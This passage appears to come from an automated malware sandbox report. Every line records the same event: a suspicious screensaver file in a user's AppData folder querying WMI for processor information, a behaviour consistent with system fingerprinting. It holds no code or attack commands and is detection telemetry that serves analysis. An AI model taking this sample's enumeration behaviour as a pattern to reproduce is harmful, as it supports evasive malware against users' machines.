                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
